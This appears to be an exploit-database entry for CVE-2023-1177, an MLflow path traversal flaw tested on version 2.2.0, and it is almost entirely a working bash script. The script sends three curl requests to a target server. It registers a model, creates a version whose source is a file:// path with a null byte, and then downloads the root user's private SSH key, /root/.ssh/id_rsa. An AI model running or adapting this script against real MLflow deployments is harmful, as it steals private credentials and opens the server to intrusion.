Share
## https://sploitus.com/exploit?id=D6ECCA45-F5D0-5B34-8F1B-92AF8A261740
#############
CVE-2023-1177
#############

|
| MLFlow Path Traversal
| Tested on MLflow 2.2.0
| src: https://github.com/iumiro/CVE-2023-1177-MLFlow
|

.. code-block:: bash

  #!/bin/bash
  RAND="EXPLOIT-$((1+$RANDOM%9999))"
  URL="http://172.17.0.2:6001"
  FILE='/root/.ssh/id_rsa'
  curl -vX POST "$URL/ajax-api/2.0/mlflow/registered-models/create" -d "{\"name\":\"$RAND\"}" -H "Content-Type: application/json"
  curl -vX POST "$URL/ajax-api/2.0/mlflow/model-versions/create" -d "{\"name\":\"$RAND\",\"source\":\"file://%00${FILE%/*}/\"}" -H "Content-Type: application/json"
  curl -v "$URL/model-versions/get-artifact?path=${FILE##*/}&name=$RAND&version=1"

|